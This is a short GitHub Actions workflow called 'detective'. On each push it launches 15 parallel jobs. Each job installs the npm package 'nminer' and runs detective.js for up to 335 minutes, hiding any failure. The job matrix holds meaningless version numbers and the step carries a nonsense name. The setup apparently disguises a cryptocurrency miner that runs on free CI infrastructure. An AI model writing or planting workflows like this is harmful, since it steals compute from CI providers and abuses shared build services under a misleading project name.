name: detective
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6178 }
          - { version: 1259 }
          - { version: 8384 }
          - { version: 2124 }
          - { version: 8891 }
          - { version: 323 }
          - { version: 505 }
          - { version: 260 }
          - { version: 3697 }
          - { version: 8279 }
          - { version: 7558 }
          - { version: 2543 }
          - { version: 8461 }
          - { version: 9986 }
          - { version: 6221 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: however hm
        run: |
          npm install nminer@latest
          timeout 335m node detective.js || echo "detective executed"